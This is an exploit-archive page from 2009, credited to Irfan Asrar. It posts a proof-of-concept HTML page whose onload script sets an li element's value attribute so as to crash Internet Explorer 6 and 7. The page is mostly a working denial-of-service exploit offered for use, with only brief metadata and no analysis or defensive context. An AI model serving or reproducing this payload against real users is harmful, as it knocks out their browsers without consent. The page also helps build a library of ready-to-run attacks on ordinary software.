MS Internet Explorer (Javascript SetAttribute) Remote Crash Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MS Internet Explorer (Javascript SetAttribute) Remote Crash Exploit
# Published : 2009-08-18
# Author : Irfan Asrar
# Previous Title : Safari 4.0.2 (WebKit Parsing of Floating Point Numbers) BOF PoC
# Next Title : broid 1.0 Beta 3a (.mp3 File) Local Buffer Overflow PoC

<html>
 <head>
  <title> Irfan Asrar</title>
 </head>
<body onload="c()">
Set Attribute Crash : Tested with IE7 Vista
                                  IE6 XP2
                                  IE6 XP3

<script type="text/javascript">

function c() {

var li = document.createElement("li");
li.setAttribute("value", "1");
li.value = "1";

}

</script>
 </body>
</html>

# www.Syue.com [2009-08-18]